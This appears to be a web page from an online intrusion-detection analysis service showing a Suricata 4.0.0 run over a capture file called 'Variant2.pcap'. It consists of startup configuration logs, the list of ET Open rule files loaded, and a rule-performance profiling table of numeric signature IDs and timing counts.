Filename: Variant2.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etopen-all
Runtime: 9.32131505013 seconds
Hash: 4c58c645061d62e63195d3f25b9611f1
Uploaded: 1542380231

Logfiles


suricata-report-2018-11-16-T-14-57-21-11162018.1456-Variant2.pcap.txt - (18286 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/4c58c645061d62e63195d3f25b9611f1d2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/11162018.1456-Variant2.pcap -vvv -k none
elapsedtime:8.400815
stderr:
stdout:
16/11/2018 -- 14:57:12 - <Info> - Configuration node 'rule-files' redefined.
16/11/2018 -- 14:57:12 - <Notice> - This is Suricata version 4.0.0 RELEASE
16/11/2018 -- 14:57:12 - <Info> - CPUs/cores online: 1
16/11/2018 -- 14:57:12 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 31874 and 'request-body-inspect-window' set to 16645 after randomization.
16/11/2018 -- 14:57:12 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32449 and 'response-body-inspect-window' set to 16844 after randomization.
16/11/2018 -- 14:57:12 - <Config> - DNS request flood protection level: 500
16/11/2018 -- 14:57:12 - <Config> - DNS per flow memcap (state-memcap): 524288
16/11/2018 -- 14:57:12 - <Config> - DNS global memcap: 16777216
16/11/2018 -- 14:57:12 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
16/11/2018 -- 14:57:12 - <Config> - preallocated 1000 hosts of size 136
16/11/2018 -- 14:57:12 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
16/11/2018 -- 14:57:12 - <Config> - using magic-file /usr/share/file/magic
16/11/2018 -- 14:57:12 - <Config> - Core dump size is unlimited.
16/11/2018 -- 14:57:12 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
16/11/2018 -- 14:57:12 - <Config> - preallocated 1000 defrag trackers of size 168
16/11/2018 -- 14:57:12 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
16/11/2018 -- 14:57:12 - <Config> - stream "prealloc-sessions": 2048 (per thread)
16/11/2018 -- 14:57:12 - <Config> - stream "memcap": 33554432
16/11/2018 -- 14:57:12 - <Config> - stream "midstream" session pickups: disabled
16/11/2018 -- 14:57:12 - <Config> - stream "async-oneside": disabled
16/11/2018 -- 14:57:12 - <Config> - stream "checksum-validation": disabled
16/11/2018 -- 14:57:12 - <Config> - stream."inline": disabled
16/11/2018 -- 14:57:12 - <Config> - stream "bypass": disabled
16/11/2018 -- 14:57:12 - <Config> - stream "max-synack-queued": 5
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "memcap": 134217728
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "depth": 0
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "toserver-chunk-size": 2561
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "toclient-chunk-size": 2524
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly.raw: enabled
16/11/2018 -- 14:57:12 - <Config> - stream.reassembly "segment-prealloc": 2048
16/11/2018 -- 14:57:12 - <Config> - Delayed detect disabled
16/11/2018 -- 14:57:12 - <Config> - pattern matchers: MPM: ac, SPM: bm
16/11/2018 -- 14:57:12 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
16/11/2018 -- 14:57:12 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
16/11/2018 -- 14:57:12 - <Config> - prefilter engines: MPM
16/11/2018 -- 14:57:12 - <Config> - IP reputation disabled
16/11/2018 -- 14:57:12 - <Perf> - Registered 148 keyword profiling counters.
16/11/2018 -- 14:57:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-ftp.rules
16/11/2018 -- 14:57:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-policy.rules
16/11/2018 -- 14:57:12 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-trojan.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-games.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-pop3.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-user_agents.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-activex.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-rpc.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-attack_response.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp.rules
16/11/2018 -- 14:57:14 - <Config> - No rules loaded from ET-emerging-icmp.rules.
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-scan.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-voip.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-chat.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-icmp_info.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-info.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-shellcode.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_client.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-imap.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_server.rules
16/11/2018 -- 14:57:14 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-current_events.rules
16/11/2018 -- 14:57:15 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-inappropriate.rules
16/11/2018 -- 14:57:15 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-smtp.rules
16/11/2018 -- 14:57:15 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-web_specific_apps.rules
16/11/2018 -- 14:57:16 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-deleted.rules
16/11/2018 -- 14:57:16 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-malware.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-snmp.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-worm.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dns.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-misc.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-sql.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-dos.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-netbios.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-telnet.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-exploit.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-p2p.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-tftp.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-emerging-mobile_malware.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-botcc.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-compromised.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-drop.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-dshield.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-tor.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/ET-ciarmy.rules
16/11/2018 -- 14:57:17 - <Config> - Loading rule file: /opt/suricata400/etc/etopen/local.rules
16/11/2018 -- 14:57:17 - <Config> - No rules loaded from local.rules.
16/11/2018 -- 14:57:17 - <Info> - 44 rule files processed. 18236 rules successfully loaded, 0 rules failed
16/11/2018 -- 14:57:17 - <Info> - Threshold config parsed: 0 rule(s) found
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tcp-packet
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tcp-stream
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for udp-packet
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for other-ip
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_uri
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_request_line
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_client_body
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_response_line
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_header
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_header
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_header_names
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_header_names
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_accept
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_accept_enc
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_accept_lang
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_referer
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_connection
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_content_len
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_content_len
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_content_type
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_content_type
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_protocol
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_protocol
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_start
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_start
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_raw_header
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_raw_header
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_method
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_cookie
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_cookie
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_raw_uri
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_user_agent
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_host
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_raw_host
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_stat_msg
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_stat_code
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for dns_query
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tls_sni
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tls_cert_issuer
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tls_cert_subject
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for tls_cert_serial
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for dce_stub_data
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for dce_stub_data
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for ssh_protocol
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for ssh_protocol
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for ssh_software
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for ssh_software
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for file_data
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for file_data
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_request_line
16/11/2018 -- 14:57:17 - <Perf> - using shared mpm ctx' for http_response_line
16/11/2018 -- 14:57:17 - <Info> - 18241 signatures processed. 1175 are IP-only rules, 6125 are inspecting packet payload, 13172 inspect application layer, 0 are decoder event only
16/11/2018 -- 14:57:17 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
16/11/2018 -- 14:57:17 - <Perf> - TCP toserver: 41 port groups, 40 unique SGH's, 1 copies
16/11/2018 -- 14:57:17 - <Perf> - TCP toclient: 21 port groups, 21 unique SGH's, 0 copies
16/11/2018 -- 14:57:17 - <Perf> - UDP toserver: 41 port groups, 33 unique SGH's, 8 copies
16/11/2018 -- 14:57:17 - <Perf> - UDP toclient: 21 port groups, 15 unique SGH's, 6 copies
16/11/2018 -- 14:57:17 - <Perf> - OTHER toserver: 254 proto groups, 2 unique SGH's, 252 copies
16/11/2018 -- 14:57:17 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
16/11/2018 -- 14:57:18 - <Perf> - Unique rule groups: 111
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toserver TCP packet": 31
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toclient TCP packet": 20
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toserver TCP stream": 31
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toclient TCP stream": 21
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toserver UDP packet": 33
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "toclient UDP packet": 15
16/11/2018 -- 14:57:18 - <Perf> - Builtin MPM "other IP packet": 2
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_uri": 8
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_request_line": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_client_body": 6
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_response_line": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_header": 6
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_header": 3
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_header_names": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_accept": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_referer": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_content_len": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_content_type": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_content_type": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_start": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_method": 3
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_cookie": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_cookie": 2
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_user_agent": 4
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver http_host": 2
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient http_stat_code": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver dns_query": 4
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver tls_sni": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toserver file_data": 1
16/11/2018 -- 14:57:18 - <Perf> - AppLayer MPM "toclient file_data": 5
16/11/2018 -- 14:57:19 - <Perf> - Registered 18241 rule profiling counters.
16/11/2018 -- 14:57:19 - <Info> - fast output device (regular) initialized: alert
16/11/2018 -- 14:57:19 - <Info> - eve-log output device (regular) initialized: eve.json
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'alert'
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'http'
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'dns'
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'tls'
16/11/2018 -- 14:57:19 - <Config> - enabling 'eve-log' module 'files'
16/11/2018 --

This file has been truncated. Go here to download in full.


suricata-4.0.0-etopen-all-perf.txt-2018-11-16-T-14-57-21-11162018.1456-Variant2.pcap.txt - (70359 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 11/16/2018 -- 14:57:21. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2019881      1        3        18427894     8.07   97       0        15667122    189978.29   0.00        189978.29  
  2        2017552      1        6        23507456     10.29  678      0        13116585    34671.76    0.00        34671.76   
  3        2023614      1        3        12311052     5.39   2        0        12308243    6155526.00  0.00        6155526.00 
  4        2018496      1        9        5304902      2.32   97       0        2526692     54689.71    0.00        54689.71   
  5        2025185      1        3        9613623      4.21   77       0        671994      124852.25   0.00        124852.25  
  6        2015977      1        7        595584       0.26   1        0        595584      595584.00   0.00        595584.00  
  7        2019185      1        4        944022       0.41   7        0        488946      134860.29   0.00        134860.29  
  8        2018299      1        3        3874801      1.70   15       0        442434      258320.07   0.00        258320.07  
  9        2020865      1        3        5276046      2.31   36       0        409629      146556.83   0.00        146556.83  
  10       2017072      1        3        1396294      0.61   9        0        408391      155143.78   0.00        155143.78  
  11       2017899      1        4        345864       0.15   1        0        345864      345864.00   0.00        345864.00  
  12       2017501      1        2        1108285      0.49   5        0        344370      221657.00   0.00        221657.00  
  13       2020979      1        3        2015416      0.88   24       0        336392      83975.67    0.00        83975.67   
  14       2020397      1        2        302145       0.13   1        0        302145      302145.00   0.00        302145.00  
  15       2017502      1        2        967921       0.42   5        0        301395      193584.20   0.00        193584.20  
  16       2017500      1        2        965964       0.42   5        0        281018      193192.80   0.00        193192.80  
  17       2021749      1        6        879688       0.39   4        0        271237      219922.00   0.00        219922.00  
  18       2020842      1        2        594532       0.26   4        0        269631      148633.00   0.00        148633.00  
  19       2017499      1        2        849954       0.37   5        0        245575      169990.80   0.00        169990.80  
  20       2019181      1        7        550603       0.24   4        0        229724      137650.75   0.00        137650.75  
  21       2022797      1        2        201911       0.09   1        0        201911      201911.00   0.00        201911.00  
  22       2018342      1        2        444695       0.19   4        0        167044      111173.75   0.00        111173.75  
  23       2018469      1        2        156690       0.07   1        0        156690      156690.00   0.00        156690.00  
  24       2018358      1        7        3828548      1.68   105      0        145425      36462.36    0.00        36462.36   
  25       2017824      1        3        1223940      0.54   17       0        145128      71996.47    0.00        71996.47   
  26       2018440      1        4        136725       0.06   1        0        136725      136725.00   0.00        136725.00  
  27       2025044      1        2        172212       0.08   2        0        134820      86106.00    0.00        86106.00   
  28       2025064      1        5        3773224      1.65   97       0        132949      38899.22    0.00        38899.22   
  29       2022989      1        2        615707       0.27   8        0        121893      76963.38    0.00        76963.38   
  30       2015045      1        4        114860       0.05   1        0        114860      114860.00   0.00        114860.00  
  31       2024228      1        3        470699       0.21   6        0        107776      78449.83    0.00        78449.83   
  32       2021035      1        3        157518       0.07   3        0        102300      52506.00    0.00        52506.00   
  33       2017963      1        3        101263       0.04   1        0        101263      101263.00   0.00        101263.00  
  34       2014913      1        2        150027       0.07   2        0        100276      75013.50    0.00        75013.50   
  35       2015978      1        7        188339       0.08   2        0        99331       94169.50    0.00        94169.50   
  36       2018260      1        4        637791       0.28   9        0        99000       70865.67    0.00        70865.67   
  37       2018226      1        3        98060        0.04   1        0        98060       98060.00    0.00        98060.00   
  38       2025040      1        3        141727       0.06   2        0        97981       70863.50    0.00        70863.50   
  39       2025043      1        2        170397       0.07   2        0        97817       85198.50    0.00        85198.50   
  40       2011894      1        19       3420123      1.50   97       0        97718       35259.00    0.00        35259.00   
  41       2025047      1        3        179464       0.08   2        0        96640       89732.00    0.00        89732.00   
  42       2018010      1        5        2220656      0.97   97       0        96108       22893.36    0.00        22893.36   
  43       2015711      1        6        94945        0.04   1        0        94945       94945.00    0.00        94945.00   
  44       2018005      1        6        358960       0.16   4        0        94167       89740.00    0.00        89740.00   
  45       2019655      1        6        139949       0.06   2        1        93837       69974.50    93837.00    46112.00   
  46       2017811      1        2        163696       0.07   3        0        93616       54565.33    0.00        54565.33   
  47       2011988      1        5        160900       0.07   3        0        93332       53633.33    0.00        53633.33   
  48       2025054      1        2        170507       0.07   2        0        93114       85253.50    0.00        85253.50   
  49       2022410      1        2        418925       0.18   6        0        91588       69820.83    0.00        69820.83   
  50       2016587      1        6        164072       0.07   2        0        91384       82036.00    0.00        82036.00   
  51       2017416      1        6        90189        0.04   1        0        90189       90189.00    0.00        90189.00   
  52       2018346      1        3        89716        0.04   1        0        89716       89716.00    0.00        89716.00   
  53       2018407      1        9        854765       0.37   14       13       88779       61054.64    62705.62    39592.00   
  54       2016242      1        6        161843       0.07   2        0        87797       80921.50    0.00        80921.50   
  55       2015707      1        2        228262       0.10   4        0        87770       57065.50    0.00        57065.50   
  56       2022054      1        3        882973       0.39   13       0        86392       67921.00    0.00        67921.00   
  57       2016734      1        2        159702       0.07   2        0        84683       79851.00    0.00        79851.00   
  58       2019091      1        3        476840       0.21   9        0        83064       52982.22    0.00        52982.22   
  59       2015556      1        21       82934        0.04   1        0        82934       82934.00    0.00        82934.00   
  60       2016393      1        3        161145       0.07   2        0        82741       80572.50    0.00        80572.50   
  61       2016333      1        4        150072       0.07   2        0        82373       75036.00    0.00        75036.00   
  62       2024031      1        2        81649        0.04   1        0        81649       81649.00    0.00        81649.00   
  63       2018981      1        4        2752139      1.21   97       0        78279       28372.57    0.00        28372.57   
  64       2023150      1        3        78118        0.03   1        0        78118       78118.00    0.00        78118.00   
  65       2010067      1        10       220652       0.10   4        0        78019       55163.00    0.00        55163.00   
  66       2024565      1        3        218561       0.10   4        3        77711       54640.25    60893.67    35880.00   
  67       2022666      1        4        76891        0.03   1        0        76891       76891.00    0.00        76891.00   
  68       2018053      1        4        324685       0.14   5        0        75615       64937.00    0.00        64937.00   
  69       2018452      1        15       3426111      1.50   97       0        75337       35320.73    0.00        35320.73   
  70       2003492      1        30       2349636      1.03   100      0        75321       23496.36    0.00        23496.36   
  71       2022682      1        3        75300        0.03   1        0        75300       75300.00    0.00        75300.00   
  72       2022147      1        2        1182234      0.52   41       0        75051       28834.98    0.00        28834.98   
  73       2024650      1        1        1091054      0.48   93       0        74346       11731.76    0.00        11731.76   
  74       2016537      1        2        8776578      3.84   578      0        73890       15184.39    0.00        15184.39   
  75       2022502      1        4        2940397      1.29   99       0        73875       29700.98    0.00        29700.98   
  76       2015739      1        6        146348       0.06   2        0        73834       73174.00    0.00        73174.00   
  77       2021501      1        3        215242       0.09   6        0        73768       35873.67    0.00        35873.67   
  78       2024771      1        1        7006182      3.07   949      0        73314       7382.70     0.00        7382.70    
  79       2021762      1        2        135472       0.06   4        0        72147       33868.00    0.00        33868.00   
  80       2015823      1        6        143004       0.06   2        0        71766       71502.00    0.00        71502.00   
  81       2020825      1        6        75045        0.03   2        0        71762       37522.50    0.00        37522.50   
  82       2012981      1        5        435213       0.19   12       0        71073       36267.75    0.00        36267.75   
  83       2015846      1        3        70737        0.03   1        0        70737       70737.00    0.00        70737.00   
  84       2017613      1        9        3123035      1.37   97       0        70701       32196.24    0.00        32196.24   
  85       2024769      1        2        137528       0.06   2        0        69802       68764.00    0.00        68764.00   
  86       2022221      1        3        488400       0.21   9        0        69454       54266.67    0.00        54266.67   
  87       2020705      1        4        2143979      0.94   100      0        69273       21439.79    0.00        21439.79   
  88       2018262      1        3        69146        0.03   1        0        69146       69146.00    0.00        69146.00   
  89       2017785      1        2        69025        0.03   1        0        69025       69025.00    0.00        69025.00   
  90       2018983      1        7        2775278      1.22   97       0        68845       28611.11    0.00        28611.11   
  91       2014520      1        6        600879       0.26   66       0        68789       9104.23     0.00        9104.23    
  92       2022503      1        2        68312        0.03   1        0        68312       68312.00    0.00        68312.00   
  93       2018064      1        2        64877        0.03   1        0        64877       64877.00    0.00        64877.00   
  94       2018958      1        18       2343730      1.03   97       0        64416       24162.16    0.00        24162.16   
  95       2017073      1        3        63227        0.03   1        0        63227       63227.00    0.00        63227.00   
  96       2015695      1        4        63030        0.03   1        0        63030       63030.00    0.00        63030.00   
  97       2022609      1        2        3077856      1.35   87       0        62296       35377.66    0.00        35377.66   
  98       2017181      1        6        94125        0.04   2        0        61480       47062.50    0.00        47062.50   
  99       2019344      1        5        3349793      1.47   97       0        60689       34533.95    0.00        34533.95   
  100      2017295      1        6        100644       0.04   2        0        60107       50322.00    0.00        50322.00   
  101      2016539      1        7        165756       0.07   3        3        59397       55252.00    55252.00    0.00       
  102      2017568      1        3        58155        0.03   1        0        58155       58155.00    0.00        58155.00   
  103      2014288      1        2        89611        0.04   2        0        57933       44805.50    0.00        44805.50   
  104      2018225      1        2        57457        0.03   1        0        57457       57457.00    0.00        57457.00   
  105      2009702      1        5        483446       0.21   33       0        57242       14649.88    0.00        14649.88   
  106      2022543      1        1        263139       0.12   14       0        56793       18795.64    0.00        18795.64   
  107      2019612      1        7        316041       0.14   8        1        54375       39505.12    54375.00    37380.86   
  108      2014911      1        10       308300       0.14   15       0        54034       20553.33    0.00        20553.33   
  109      2016858      1        10       2738623      1.20   97       0        53795       28233.23    0.00        28233.23   
  110      2024555      1        7        52577        0.02   1        1        52577       52577.00    52577.00    0.00       
  111      2022074      1        3        336679       0.15   11       0        51384       30607.18    0.00        30607.18   
  112      2016223      1        10       2164075      0.95   100      0        51273       21640.75    0.00        21640.75   
  113      2020982      1        3        51254        0.02   1        1        51254       51254.00    51254.00    0.00       
  114      2024178      1        2        2213464      0.97   97       0        50934       22819.22    0.00        22819.22   
  115      2014703      1        9        345908       0.15   33       0        50504       10482.06    0.00        10482.06   
  116      2017166      1        4        100254       0.04   2        0        50447       50127.00    0.00        50127.00   
  117      2001195      1        9        1023391      0.45   86       0        50416       11899.90    0.00        11899.90   
  118      2024829      1        2        568843       0.25   25       0        50280       22753.72    0.00        22753.72   
  119      2014750      1        2        117285       0.05   3        0        49978       39095.00    0.00        39095.00   
